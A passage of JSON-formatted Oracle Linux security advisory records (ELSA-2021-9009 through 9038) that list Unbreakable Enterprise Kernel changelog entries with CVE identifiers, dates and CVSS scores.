one-byte-off kmalloc (Hakon Bugge) [Orabug: 32380824]\n- netfilter: add and use nf_hook_slow_list() (Florian Westphal) [Orabug: 32372530] {CVE-2021-20177}\n- net/rds: Fix gfp_t parameter (Hans Westgaard Ry) [Orabug: 32372158]\n- uek-rpm: Report removed symbols also during kabi check (Somasundaram Krishnasamy) [Orabug: 32380061]\n- A/A Bonding: Introduce selective interface name inclusion (Hakon Bugge) [Orabug: 32350974]\n- uek-rpm: add nfs_ssc to nano_modules (Calum Mackay) [Orabug: 32346419]\n- target: fix XCOPY NAA identifier lookup (David Disseldorp) [Orabug: 32248035] {CVE-2020-28374}\n[5.4.17-2036.103.1.el7]\n- mwifiex: Fix possible buffer overflows in mwifiex_cmd_802_11_ad_hoc_start (Zhang Xiaohui) [Orabug: 32349203] {CVE-2020-36158}\n- x86/process: Mark cpu inactive before offlining (Mridula Shastry) [Orabug: 32234812]\n- add license checking to kABI checker (Dan Duval) [Orabug: 32355206]\n[5.4.17-2036.103.0.el7]\n- lockd: don't use interval-based rebinding over TCP (Calum Mackay) [Orabug: 32337715]\n- tools: update header files in the tools directory (Thomas Tai) [Orabug: 32321484]\n- perf: Fix a kABI breakage in perf_event.h (Thomas Tai) [Orabug: 32321484]\n- perf/x86: Fix n_metric for cancelled txn (Peter Zijlstra) [Orabug: 32321484]\n- perf/x86: Fix n_pair for cancelled txn (Peter Zijlstra) [Orabug: 32321484]\n- perf/x86/intel: Check perf metrics feature for each CPU (Kan Liang) [Orabug: 32321484]\n- perf/x86/intel: Support per-thread RDPMC TopDown metrics (Kan Liang) [Orabug: 32321484]\n- perf/x86/intel: Support TopDown metrics on Ice Lake (Kan Liang) [Orabug: 32321484]\n- perf/x86: Use event_base_rdpmc for the RDPMC userspace support (Kan Liang) [Orabug: 32321484]\n- perf/x86: Add a macro for RDPMC offset of fixed counters (Kan Liang) [Orabug: 32321484]\n- perf/x86/intel: Generic support for hardware TopDown metrics (Kan Liang) [Orabug: 32321484]\n- perf/core: Add a new PERF_EV_CAP_SIBLING event capability (Kan Liang) [Orabug: 32321484]\n- perf/core: Unify {pinned,flexible}_sched_in() (Peter Zijlstra) [Orabug: 32321484]\n- perf/x86/intel: Use switch in intel_pmu_disable/enable_event (Kan Liang) [Orabug: 32321484]\n- perf/x86: Keep LBR records unchanged in host context for guest usage (Like Xu) [Orabug: 32321484]\n- perf/x86/intel: Fix the name of perf METRICS (Kan Liang) [Orabug: 32321484]\n- perf/x86/intel: Move BTS index to 47 (Kan Liang) [Orabug: 32321484]\n- perf/x86/intel: Introduce the fourth fixed counter (Kan Liang) [Orabug: 32321484]\n- perf/x86/intel: Name the global status bit in NMI handler (Kan Liang) [Orabug: 32321484]\n- perf/x86: Add constraint to create guest LBR event without hw counter (Like Xu) [Orabug: 32321484]\n- perf/x86/lbr: Add interface to get LBR information (Like Xu) [Orabug: 32321484]\n- perf/x86/core: Refactor hw->idx checks and cleanup (Like Xu) [Orabug: 32321484]\n- perf/x86/intel: Avoid unnecessary PEBS_ENABLE MSR access in PMI (Kan Liang) [Orabug: 32321484]\n- perf/x86: Provide stubs of KVM helpers for non-Intel CPUs (Sean Christopherson) [Orabug: 32321484]\n- partitions/efi: Enable no warning option for the GPT warnings related to alternative header (Saeed Mirzamohammadi) [Orabug: 32302136]\n- Revert 'cpu/hotplug: avoid race between cpuset_hotplug_workfn and later hotplug' (Daniel Jordan) [Orabug: 32295229]\n- cpuset: fix race between hotplug work and later CPU offline (Daniel Jordan) [Orabug: 32295229]\n- uek-rpm: aarch64: update PMU configs for Altra (Dave Kleikamp) [Orabug: 32290034]\n- driver/perf: Add PMU driver for the ARM DMC-620 memory controller (Tuan Phan) [Orabug: 32290034]\n- perf: arm-cmn: Fix conversion specifiers for node type (Will Deacon) [Orabug: 32290034]\n- perf: arm-cmn: Fix unsigned comparison to less than zero (Will Deacon) [Orabug: 32290034]\n- perf: Add Arm CMN-600 PMU driver (Robin Murphy) [Orabug: 32290034]\n- perf: Add Arm CMN-600 DT binding (Robin Murphy) [Orabug: 32290034]\n- perf: arm_dsu: Support DSU ACPI devices (Tuan Phan) [Orabug: 32290034]\n- arm64: acpi: Make apei_claim_sea() synchronise with APEI's irq work (James Morse) [Orabug: 32290034]\n- ACPI: APEI: Kick the memory_failure() queue for synchronous errors (James Morse) [Orabug: 32290034]\n- iommu/arm-smmu-v3: Don't reserve implementation defined register space (Jean-Philippe Brucker) [Orabug: 32290034]\n- Revert 'BACKPORT: perf: Add Arm CMN-600 DT binding' (Dave Kleikamp) [Orabug: 32290034]\n- Revert 'BACKPORT: WIP: perf: Add Arm CMN-600 PMU driver' (Dave Kleikamp) [Orabug: 32290034]\n- Revert 'BACKPORT: WIP: perf/arm-cmn: Add ACPI support' (Dave Kleikamp) [Orabug: 32290034]\n- Revert 'perf: Add ARM DMC-620 PMU driver.' (Dave Kleikamp) [Orabug: 32290034]\n- Revert 'BACKPORT: ACPI / APEI: Kick the memory_failure() queue for synchronous errors' (Dave Kleikamp) [Orabug: 32290034]\n- Revert 'BACKPORT: arm64: acpi: Make apei_claim_sea() synchronise with APEI's irq work' (Dave Kleikamp) [Orabug: 32290034]\n- Revert 'Perf: arm-cmn: Allow irq to be shared.' (Dave Kleikamp) [Orabug: 32290034]\n- Revert 'perf: arm_cmn: improve and make it work on 2P.' (Dave Kleikamp) [Orabug: 32290034]\n- Revert 'perf: arm_dsu: Allow IRQ to be shared among devices.' (Dave Kleikamp) [Orabug: 32290034]\n- Revert 'perf: arm_dsu: Support ACPI mode.' (Dave Kleikamp) [Orabug: 32290034]\n- Revert 'perf: arm_dmc620: Update ACPI ID.' (Dave Kleikamp) [Orabug: 32290034]\n- Revert 'perf: avoid breaking KABI by reusing enum' (Dave Kleikamp) [Orabug: 32290034]\n- Revert 'perf/smmuv3: Allow sharing MMIO registers with the SMMU driver' (Dave Kleikamp) [Orabug: 32290034]\n- tty: Fix ->session locking (Jann Horn) [Orabug: 32266677] {CVE-2020-29660}\n- tty: Fix ->pgrp locking in tiocspgrp() (Jann Horn) [Orabug: 32266677] {CVE-2020-29660}\n- xen-blkback: set ring->xenblkd to NULL after kthread_stop() (Pawel Wieczorkiewicz) [Orabug: 32260252] {CVE-2020-29569}\n- xenbus/xenbus_backend: Disallow pending watch messages (SeongJae Park) [Orabug: 32253409] {CVE-2020-29568}\n- xen/xenbus: Count pending messages for each watch (SeongJae Park) [Orabug: 32253409] {CVE-2020-29568}\n- xen/xenbus/xen_bus_type: Support will_handle watch callback (SeongJae Park) [Orabug: 32253409] {CVE-2020-29568}\n- xen/xenbus: Add 'will_handle' callback support in xenbus_watch_path() (SeongJae Park) [Orabug: 32253409] {CVE-2020-29568}\n- xen/xenbus: Allow watches discard events before queueing (SeongJae Park) [Orabug: 32253409] {CVE-2020-29568}\n- KVM: x86: clflushopt should be treated as a no-op by emulation (David Edmondson) [Orabug: 32251910]", "modified": "2021-02-08T00:00:00", "published": "2021-02-08T00:00:00", "id": "ELSA-2021-9038", "href": "http://linux.oracle.com/errata/ELSA-2021-9038.html", "type": "oraclelinux", "title": "Unbreakable Enterprise kernel-container security update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-06-04T20:21:10", "bulletinFamily": "unix", "cvelist": ["CVE-2020-28374", "CVE-2020-29568", "CVE-2020-29569", "CVE-2020-29660", "CVE-2020-36158", "CVE-2021-20177"], "description": "[5.4.17-2036.103.3]\n- Revert 'rds: Deregister all FRWR mr with free_mr' (aru kolappan) [Orabug: 32426610]\n[5.4.17-2036.103.2]\n- A/A Bonding: Fix a one-byte-off kmalloc (Hakon Bugge) [Orabug: 32380824] \n- netfilter: add and use nf_hook_slow_list() (Florian Westphal) [Orabug: 32372530] {CVE-2021-20177}\n- net/rds: Fix gfp_t parameter (Hans Westgaard Ry) [Orabug: 32372158] \n- uek-rpm: Report removed symbols also during kabi check (Somasundaram Krishnasamy) [Orabug: 32380061] \n- uek-rpm: update kABI lists for new symbol (Dan Duval) [Orabug: 32378206] \n- A/A Bonding: Introduce selective interface name inclusion (Hakon Bugge) [Orabug: 32350974] \n- uek-rpm: add nfs_ssc to nano_modules (Calum Mackay) [Orabug: 32346419] \n- target: fix XCOPY NAA identifier lookup (David Disseldorp) [Orabug: 32248035] {CVE-2020-28374}\n[5.4.17-2036.103.1]\n- mwifiex: Fix possible buffer overflows in mwifiex_cmd_802_11_ad_hoc_start (Zhang Xiaohui) [Orabug: 32349203] {CVE-2020-36158}\n- x86/process: Mark cpu inactive before offlining (Mridula Shastry) [Orabug: 32234812] \n- add license checking to kABI checker (Dan Duval) [Orabug: 32355206]\n[5.4.17-2036.103.0]\n- lockd: don't use interval-based rebinding over TCP (Calum Mackay) [Orabug: 32337715] \n- tools: update header files in the tools directory (Thomas Tai) [Orabug: 32321484] \n- perf: Fix a kABI breakage in perf_event.h (Thomas Tai) [Orabug: 32321484] \n- perf/x86: Fix n_metric for cancelled txn (Peter Zijlstra) [Orabug: 32321484] \n- perf/x86: Fix n_pair for cancelled txn (Peter Zijlstra) [Orabug: 32321484] \n- perf/x86/intel: Check perf metrics feature for each CPU (Kan Liang) [Orabug: 32321484] \n- perf/x86/intel: Support per-thread RDPMC TopDown metrics (Kan Liang) [Orabug: 32321484] \n- perf/x86/intel: Support TopDown metrics on Ice Lake (Kan Liang) [Orabug: 32321484] \n- perf/x86: Use event_base_rdpmc for the RDPMC userspace support (Kan Liang) [Orabug: 32321484] \n- perf/x86: Add a macro for RDPMC offset of fixed counters (Kan Liang) [Orabug: 32321484] \n- perf/x86/intel: Generic support for hardware TopDown metrics (Kan Liang) [Orabug: 32321484] \n- perf/core: Add a new PERF_EV_CAP_SIBLING event capability (Kan Liang) [Orabug: 32321484] \n- perf/core: Unify {pinned,flexible}_sched_in() (Peter Zijlstra) [Orabug: 32321484] \n- perf/x86/intel: Use switch in intel_pmu_disable/enable_event (Kan Liang) [Orabug: 32321484] \n- perf/x86: Keep LBR records unchanged in host context for guest usage (Like Xu) [Orabug: 32321484] \n- perf/x86/intel: Fix the name of perf METRICS (Kan Liang) [Orabug: 32321484] \n- perf/x86/intel: Move BTS index to 47 (Kan Liang) [Orabug: 32321484] \n- perf/x86/intel: Introduce the fourth fixed counter (Kan Liang) [Orabug: 32321484] \n- perf/x86/intel: Name the global status bit in NMI handler (Kan Liang) [Orabug: 32321484] \n- perf/x86: Add constraint to create guest LBR event without hw counter (Like Xu) [Orabug: 32321484] \n- perf/x86/lbr: Add interface to get LBR information (Like Xu) [Orabug: 32321484] \n- perf/x86/core: Refactor hw->idx checks and cleanup (Like Xu) [Orabug: 32321484] \n- perf/x86/intel: Avoid unnecessary PEBS_ENABLE MSR access in PMI (Kan Liang) [Orabug: 32321484] \n- perf/x86: Provide stubs of KVM helpers for non-Intel CPUs (Sean Christopherson) [Orabug: 32321484] \n- partitions/efi: Enable no warning option for the GPT warnings related to alternative header (Saeed Mirzamohammadi) [Orabug: 32302136] \n- Revert 'cpu/hotplug: avoid race between cpuset_hotplug_workfn and later hotplug' (Daniel Jordan) [Orabug: 32295229] \n- cpuset: fix race between hotplug work and later CPU offline (Daniel Jordan) [Orabug: 32295229] \n- uek-rpm: aarch64: update PMU configs for Altra (Dave Kleikamp) [Orabug: 32290034] \n- driver/perf: Add PMU driver for the ARM DMC-620 memory controller (Tuan Phan) [Orabug: 32290034] \n- perf: arm-cmn: Fix conversion specifiers for node type (Will Deacon) [Orabug: 32290034] \n- perf: arm-cmn: Fix unsigned comparison to less than zero (Will Deacon) [Orabug: 32290034] \n- perf: Add Arm CMN-600 PMU driver (Robin Murphy) [Orabug: 32290034] \n- perf: Add Arm CMN-600 DT binding (Robin Murphy) [Orabug: 32290034] \n- perf: arm_dsu: Support DSU ACPI devices (Tuan Phan) [Orabug: 32290034] \n- arm64: acpi: Make apei_claim_sea() synchronise with APEI's irq work (James Morse) [Orabug: 32290034] \n- ACPI: APEI: Kick the memory_failure() queue for synchronous errors (James Morse) [Orabug: 32290034] \n- iommu/arm-smmu-v3: Don't reserve implementation defined register space (Jean-Philippe Brucker) [Orabug: 32290034] \n- Revert 'BACKPORT: perf: Add Arm CMN-600 DT binding' (Dave Kleikamp) [Orabug: 32290034] \n- Revert 'BACKPORT: WIP: perf: Add Arm CMN-600 PMU driver' (Dave Kleikamp) [Orabug: 32290034] \n- Revert 'BACKPORT: WIP: perf/arm-cmn: Add ACPI support' (Dave Kleikamp) [Orabug: 32290034] \n- Revert 'perf: Add ARM DMC-620 PMU driver.' (Dave Kleikamp) [Orabug: 32290034] \n- Revert 'BACKPORT: ACPI / APEI: Kick the memory_failure() queue for synchronous errors' (Dave Kleikamp) [Orabug: 32290034] \n- Revert 'BACKPORT: arm64: acpi: Make apei_claim_sea() synchronise with APEI's irq work' (Dave Kleikamp) [Orabug: 32290034] \n- Revert 'Perf: arm-cmn: Allow irq to be shared.' (Dave Kleikamp) [Orabug: 32290034] \n- Revert 'perf: arm_cmn: improve and make it work on 2P.' (Dave Kleikamp) [Orabug: 32290034] \n- Revert 'perf: arm_dsu: Allow IRQ to be shared among devices.' (Dave Kleikamp) [Orabug: 32290034] \n- Revert 'perf: arm_dsu: Support ACPI mode.' (Dave Kleikamp) [Orabug: 32290034] \n- Revert 'perf: arm_dmc620: Update ACPI ID.' (Dave Kleikamp) [Orabug: 32290034] \n- Revert 'perf: avoid breaking KABI by reusing enum' (Dave Kleikamp) [Orabug: 32290034] \n- Revert 'perf/smmuv3: Allow sharing MMIO registers with the SMMU driver' (Dave Kleikamp) [Orabug: 32290034] \n- tty: Fix ->session locking (Jann Horn) [Orabug: 32266677] {CVE-2020-29660}\n- tty: Fix ->pgrp locking in tiocspgrp() (Jann Horn) [Orabug: 32266677] {CVE-2020-29660}\n- xen-blkback: set ring->xenblkd to NULL after kthread_stop() (Pawel Wieczorkiewicz) [Orabug: 32260252] {CVE-2020-29569}\n- xenbus/xenbus_backend: Disallow pending watch messages (SeongJae Park) [Orabug: 32253409] {CVE-2020-29568}\n- xen/xenbus: Count pending messages for each watch (SeongJae Park) [Orabug: 32253409] {CVE-2020-29568}\n- xen/xenbus/xen_bus_type: Support will_handle watch callback (SeongJae Park) [Orabug: 32253409] {CVE-2020-29568}\n- xen/xenbus: Add 'will_handle' callback support in xenbus_watch_path() (SeongJae Park) [Orabug: 32253409] {CVE-2020-29568}\n- xen/xenbus: Allow watches discard events before queueing (SeongJae Park) [Orabug: 32253409] {CVE-2020-29568}\n- KVM: x86: clflushopt should be treated as a no-op by emulation (David Edmondson) [Orabug: 32251910]", "modified": "2021-02-08T00:00:00", "published": "2021-02-08T00:00:00", "id": "ELSA-2021-9037", "href": "http://linux.oracle.com/errata/ELSA-2021-9037.html", "type": "oraclelinux", "title": "Unbreakable Enterprise kernel security update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-06-04T20:21:12", "bulletinFamily": "unix", "cvelist": ["CVE-2020-28374", "CVE-2020-29568", "CVE-2020-29569"], "description": "[4.14.35-2025.404.1.2]\n- Revert 'rds: Deregister all FRWR mr with free_mr' (aru kolappan) [Orabug: 32426280]", "modified": "2021-01-30T00:00:00", "published": "2021-01-30T00:00:00", "id": "ELSA-2021-9023", "href": "http://linux.oracle.com/errata/ELSA-2021-9023.html", "type": "oraclelinux", "title": "Unbreakable Enterprise kernel security update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-06-04T20:21:16", "bulletinFamily": "unix", "cvelist": ["CVE-2020-28374", "CVE-2020-29568", "CVE-2020-29569"], "description": "[4.14.35-2025.404.1.2.el7]\n- Revert 'rds: Deregister all FRWR mr with free_mr' (aru kolappan) [Orabug:\n 32426280]", "modified": "2021-02-01T00:00:00", "published": "2021-02-01T00:00:00", "id": "ELSA-2021-9025", "href": "http://linux.oracle.com/errata/ELSA-2021-9025.html", "type": "oraclelinux", "title": "Unbreakable Enterprise kernel-container security update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-06-04T20:20:47", "bulletinFamily": "unix", "cvelist": ["CVE-2020-28374", "CVE-2020-29568", "CVE-2020-29569"], "description": "[4.14.35-2025.404.1.2.el7]\n- Revert 'rds: Deregister all FRWR mr with free_mr' (aru kolappan) [Orabug:\n 32426280]", "modified": "2021-02-01T00:00:00", "published": "2021-02-01T00:00:00", "id": "ELSA-2021-9024", "href": "http://linux.oracle.com/errata/ELSA-2021-9024.html", "type": "oraclelinux", "title": "Unbreakable Enterprise kernel-container security update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-06-04T20:20:53", "bulletinFamily": "unix", "cvelist": ["CVE-2020-27673", "CVE-2020-28374", "CVE-2020-29568", "CVE-2020-29569"], "description": "[4.1.12-124.46.4.1]\n- target: fix XCOPY NAA identifier lookup (Mike Christie) [Orabug: 32248041] {CVE-2020-28374}\n[4.1.12-124.46.4]\n- xen/events: block rogue events for some time (Juergen Gross) [Orabug: 31984335] {CVE-2020-27673}\n- xen/events: defer eoi in case of excessive number of events (Juergen Gross) [Orabug: 31984335] {CVE-2020-27673}\n- xen/events: use a common cpu hotplug hook for event channels (Juergen Gross) [Orabug: 31984335] {CVE-2020-27673}\n- xen/events: switch user event channels to lateeoi model (Juergen Gross) [Orabug: 31984335] {CVE-2020-27673}\n- xen/pciback: use lateeoi irq binding (Juergen Gross) [Orabug: 31984335] {CVE-2020-27673}\n- xen/scsiback: use lateeoi irq binding (Juergen Gross) [Orabug: 31984335] {CVE-2020-27673}\n- xen/netback: use lateeoi irq binding (Juergen Gross) [Orabug: 31984335] {CVE-2020-27673}\n- xen/blkback: use lateeoi irq binding (Juergen Gross) [Orabug: 31984335] {CVE-2020-27673}\n- xen/events: add a new 'late EOI' evtchn framework (Juergen Gross) [Orabug: 31984335] {CVE-2020-27673}\n- xen/events: fix race in evtchn_fifo_unmask() (Juergen Gross) [Orabug: 31984335] {CVE-2020-27673}\n- xen/events: add a proper barrier to 2-level uevent unmasking (Juergen Gross) [Orabug: 31984335] {CVE-2020-27673}\n- xen-blkback: set ring->xenblkd to NULL after kthread_stop() (Pawel Wieczorkiewicz) [Orabug: 32223358] {CVE-2020-29569}", "modified": "2021-01-12T00:00:00", "published": "2021-01-12T00:00:00", "id": "ELSA-2021-9009", "href": "http://linux.oracle.com/errata/ELSA-2021-9009.html", "type": "oraclelinux", "title": "Unbreakable Enterprise kernel security update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-06-04T20:21:13", "bulletinFamily": "unix", "cvelist": ["CVE-2019-19770", "CVE-2019-19816", "CVE-2020-14351", "CVE-2020-25656", "CVE-2020-25704", "CVE-2020-27673", "CVE-2020-28374", "CVE-2020-29568", "CVE-2020-29569", "CVE-2020-29660", "CVE-2020-36158", "CVE-2021-26930", "CVE-2021-26931", "CVE-2021-26932"], "description": "[4.14.35-2047.500.9.1]\n- xen-blkback: fix error handling in xen_blkbk_map() (Jan Beulich) [Orabug: 32492110] {CVE-2021-26930}\n- xen-scsiback: dont 'handle' error by BUG() (Jan Beulich) [Orabug: 32492102] {CVE-2021-26931}\n- xen-netback: dont 'handle' error by BUG() (Jan Beulich) [Orabug: 32492102] {CVE-2021-26931}\n- xen-blkback: dont 'handle' error by BUG() (Jan Beulich) [Orabug: 32492102] {CVE-2021-26931}\n- Xen/gntdev: correct error checking in gntdev_map_grant_pages() (Jan Beulich) [Orabug: 32492094] {CVE-2021-26932}\n- Xen/gntdev: correct dev_bus_addr handling in gntdev_map_grant_pages() (Jan Beulich) [Orabug: 32492094] {CVE-2021-26932}\n- Xen/x86: also check kernel mapping in set_foreign_p2m_mapping() (Jan Beulich) [Orabug: 32492094] {CVE-2021-26932}\n- Xen/x86: dont bail early from clear_foreign_p2m_mapping() (Jan Beulich) [Orabug: 32492094] {CVE-2021-26932}\n[4.14.35-2047.500.9]\n- Revert 'rds: Deregister all FRWR mr with free_mr' (aru kolappan) [Orabug: 32426612] \n- A/A Bonding: Add synchronized bundle failback (Gerd Rausch) [Orabug: 31175013] \n- net/rds: Incorrect RDS protocol version fall back (Ka-Cheong Poon) [Orabug: 32376163] \n- net/rds: Missing RDS/RDMA private data in response to connection request (Ka-Cheong Poon) [Orabug: 32388407]\n[4.14.35-2047.500.8]\n- uek-rpm: update kABI lists for new symbol (Dan Duval) [Orabug: 32341032] \n- net/rds: Fix gfp_t parameter (Hans Westgaard Ry) [Orabug: 32372161] \n- A/A Bonding: Fix a one-byte-off kmalloc (Hakon Bugge) [Orabug: 32380826] \n- x86/process: Mark cpu inactive before offlining (Mridula Shastry) [Orabug: 32245078] \n- A/A Bonding: Introduce selective interface name inclusion (Hakon Bugge) [Orabug: 32350976] \n- net/mlx5: Use a single MSIX vector for all control EQs in VFs (Ariel Levkovich) [Orabug: 32368440] \n- net/mlx5: Fix available EQs FW used to reserve (Denis Drozdov) [Orabug: 32368440] \n- net/mlx5: Use max_num_eqs for calculation of required MSIX vectors (Denis Drozdov) [Orabug: 32368440] \n- net/mlx5: Expose DEVX specification (Yishai Hadas) [Orabug: 32368440] \n- target: fix XCOPY NAA identifier lookup (David Disseldorp) [Orabug: 32248037] {CVE-2020-28374}\n[4.14.35-2047.500.7]\n- partitions/efi: Enable no warning option for the GPT warnings related to alternative header (Saeed Mirzamohammadi) [Orabug: 32047319] \n- xenbus/xenbus_backend: Disallow pending watch messages (SeongJae Park) [Orabug: 32253411] {CVE-2020-29568}\n- xen/xenbus: Count pending messages for each watch (SeongJae Park) [Orabug: 32253411] {CVE-2020-29568}\n- xen/xenbus/xen_bus_type: Support will_handle watch callback (SeongJae Park) [Orabug: 32253411] {CVE-2020-29568}\n- xen/xenbus: Add 'will_handle' callback support in xenbus_watch_path() (SeongJae Park) [Orabug: 32253411] {CVE-2020-29568}\n- xen/xenbus: Allow watches discard events before queueing (SeongJae Park) [Orabug: 32253411] {CVE-2020-29568}\n- xen-blkback: set ring->xenblkd to NULL after kthread_stop() (Pawel Wieczorkiewicz) [Orabug: 32260255] {CVE-2020-29569}\n- lockd: dont use interval-based rebinding over TCP (Calum Mackay) [Orabug: 32337717] \n- mwifiex: Fix possible buffer overflows in mwifiex_cmd_802_11_ad_hoc_start (Zhang Xiaohui) [Orabug: 32349205] {CVE-2020-36158}\n- add license checking to kABI checker (Dan Duval) [Orabug: 32355208]\n[4.14.35-2047.500.6]\n- net/rds: Only yield with a valid 'i_connecting_ts' timestamp (Gerd Rausch) [Orabug: 31030774] \n- net/rds: Only increment rdma_resolve_route timeout on error (Gerd Rausch) [Orabug: 31030774] \n- net/rds: Dont block workqueues 'cma_wq' and 'cm.wq' (Gerd Rausch) [Orabug: 31030774] \n- net/rds: Dont drop neighbor loopback connection (Gerd Rausch) [Orabug: 31030774] \n- net/rds: Take the GID offset into account for IB devices (Gerd Rausch) [Orabug: 31030774] \n- net/rds: Leave the neighbor cache alone (Gerd Rausch) [Orabug: 31030774] \n- net/rds: Give each connection its own workqueue (Gerd Rausch) [Orabug: 31030774] \n- net/rds: Disassociate ic and cm_id before rdma_destroy_id (Gerd Rausch) [Orabug: 31030774] \n- Revert 'rds: ib: Implement proper cm_id compare' (Gerd Rausch) [Orabug: 31030774] \n- net/rds: Add a rdma_cm watchdog timer (Gerd Rausch) [Orabug: 31030774] \n- Revert 'RDS: IB: fix panic with handlers running post teardown' (Gerd Rausch) [Orabug: 31030774] \n- net/rds: Release all resources allocated by 'rds_ib_setup_qp' (Gerd Rausch) [Orabug: 31030774] \n- net/rds: Change the 'rds_aux_wq' workqueue to loose order (Gerd Rausch) [Orabug: 31030774] \n- net/rds: Dont sleep inside worker threads (Gerd Rausch) [Orabug: 31030774] \n- net/rds: Fix a few race conditions (Gerd Rausch) [Orabug: 31030774] \n- net/rds: Execute 'rdma_destroy_id' in the background (Gerd Rausch) [Orabug: 31030774] \n- net/rds: Delay reconnects from passive side by 3 seconds (Gerd Rausch) [Orabug: 31030774] \n- net/rds: Drop connections when peers perform failover (Gerd Rausch) [Orabug: 31030774] \n- net/rds: Yield to incoming connection requests (Gerd Rausch) [Orabug: 31030774] \n- net/rds: Remove stale comments about random backoff (Gerd Rausch) [Orabug: 31030774]\n[4.14.35-2047.500.5]\n- KVM: x86: clflushopt should be treated as a no-op by emulation (David Edmondson) [Orabug: 32251912] \n- tty: Fix ->session locking (Jann Horn) [Orabug: 32266679] {CVE-2020-29660}\n- tty: Fix ->pgrp locking in tiocspgrp() (Jann Horn) [Orabug: 32266679] {CVE-2020-29660}\n[4.14.35-2047.500.4]\n- bnxt_en: Release PCI regions when DMA mask setup fails during probe. (Michael Chan) [Orabug: 32223677] \n- bnxt_en: fix error return code in bnxt_init_board() (Zhang Changzhong) [Orabug: 32223677] \n- bnxt_en: fix error return code in bnxt_init_one() (Zhang Changzhong) [Orabug: 32223677] \n- bnxt_en: Fix counter overflow logic. (Michael Chan) [Orabug: 32223677] \n- bnxt_en: read EEPROM A2h address using page 0 (Edwin Peer) [Orabug: 32223677] \n- bnxt_en: Re-write PCI BARs after PCI fatal error. (Vasundhara Volam) [Orabug: 32223677] \n- bnxt_en: Set driver default message level. (Michael Chan) [Orabug: 32223677] \n- bnxt_en: Enable online self tests for multi-host/NPAR mode. (Vasundhara Volam) [Orabug: 32223677] \n- bnxt_en: Eliminate unnecessary RX resets. (Michael Chan) [Orabug: 32223677] \n- bnxt_en: Reduce unnecessary message log during RX errors. (Michael Chan) [Orabug: 32223677] \n- bnxt_en: Add a software counter for RX ring reset. (Michael Chan) [Orabug: 32223677] \n- bnxt_en: Implement RX ring reset in response to buffer errors. (Michael Chan) [Orabug: 32223677] \n- bnxt_en: Refactor bnxt_init_one_rx_ring(). (Michael Chan) [Orabug: 32223677] \n- bnxt_en: Refactor bnxt_free_rx_skbs(). (Michael Chan) [Orabug: 32223677] \n- bnxt_en: Update firmware interface spec to 1.10.1.68. (Vasundhara Volam) [Orabug: 32223677] \n- bnxt_en: Improve preset max value for ethtool -l. (Michael Chan) [Orabug: 32223677] \n- bnxt_en: Handle ethernet link being disabled by firmware. (Michael Chan) [Orabug: 32223677] \n- bnxt_en: add basic infrastructure to support PAM4 link speeds (Edwin Peer) [Orabug: 32223677] \n- bnxt_en: refactor bnxt_get_fw_speed() (Edwin Peer) [Orabug: 32223677] \n- bnxt_en: refactor code to limit speed advertising (Edwin Peer) [Orabug: 32223677] \n- bnxt_en: Update firmware interface spec to 1.10.1.65. (Michael Chan) [Orabug: 32223677] \n- bnxt_en: Fix wrong flag value passed to HWRM_PORT_QSTATS_EXT fw call. (Michael Chan) [Orabug: 32223677] \n- bnxt_en: Fix HWRM_FUNC_QSTATS_EXT firmware call. (Michael Chan) [Orabug: 32223677] \n- bnxt_en: Return -EOPNOTSUPP for ETHTOOL_GREGS on VFs. (Vasundhara Volam) [Orabug: 32223677] \n- bnxt_en: return proper error codes in bnxt_show_temp (Edwin Peer) [Orabug: 32223677] \n- bnxt_en: Setup default RSS map in all scenarios. (Michael Chan) [Orabug: 32223677] \n- bnxt_en: init RSS table for Minimal-Static VF reservation (Edwin Peer) [Orabug: 32223677] \n- bnxt_en: fix HWRM error when querying VF temperature (Edwin Peer) [Orabug: 32223677] \n- bnxt_en: Fix ethtool -S statitics with XDP or TCs enabled. (Michael Chan) [Orabug: 32223677] \n- bnxt_en: Dont query FW when netif_running() is false. (Pavan Chebbi) [Orabug: 32223677] \n- bnxt_en: Add support for 'ethtool -d' (Vasundhara Volam) [Orabug: 32223677] \n- bnxt_en: Switch over to use the 64-bit software accumulated counters. (Michael Chan) [Orabug: 32223677] \n- bnxt_en: Accumulate all counters. (Michael Chan) [Orabug: 32223677] \n- bnxt_en: Retrieve hardware masks for port counters. (Michael Chan) [Orabug: 32223677] \n- bnxt_en: Retrieve hardware counter masks from firmware if available. (Michael Chan) [Orabug: 32223677] \n- bnxt_en: Allocate additional memory for all statistics blocks. (Michael Chan) [Orabug: 32223677] \n- bnxt_en: Refactor statistics code and structures. (Michael Chan) [Orabug: 32223677] \n- bnxt_en: Use macros to define port statistics size and offset. (Michael Chan) [Orabug: 32223677] \n- bnxt_en: Update firmware interface to 1.10.1.54. (Michael Chan) [Orabug: 32223677] \n- bnxt_en: Remove PCIe non-counters from ethtool statistics (Vasundhara Volam) [Orabug: 32223677] \n- net: bnxt: don't complain if TC flower can't be supported (Jakub Kicinski) [Orabug: 32223677] \n- bnxt_en: Fix completion ring sizing with TPA enabled. (Michael Chan) [Orabug: 32223677] \n- bnxt_en: Init ethtool link settings after reading updated PHY configuration. (Vasundhara Volam) [Orabug: 32223677] \n- perf/core: Fix race in the perf_mmap_close() function (Jiri Olsa) [Orabug: 32233354] {CVE-2020-14351}\n- vhost scsi: fix lun reset completion handling (Mike Christie) [Orabug: 32201608] \n- vhost scsi: Add support for LUN resets. (Mike Christie) [Orabug: 32201608] \n- vhost/scsi: Use copy_to_iter() to send control queue response (Bijan Mottahedeh) [Orabug: 32201608] \n- vhost scsi: add lun parser helper (Mike Christie) [Orabug: 32201608] \n- vhost scsi: fix cmd completion race (Mike Christie) [Orabug: 32201608] \n- vhost scsi: alloc cmds per vq instead of session (Mike Christie) [Orabug: 32201608] \n- vhost: add helper to check if a vq has been setup (Mike Christie) [Orabug: 32201608] \n- scsi: sd: Allow user to configure command retries (Mike Christie) [Orabug: 32201608] \n- scsi: core: Add limitless cmd retry support (Mike Christie) [Orabug: 32201608] \n- dm crypt: Allow unaligned bio buffer lengths for skcipher devices (Sudhakar Panneerselvam) 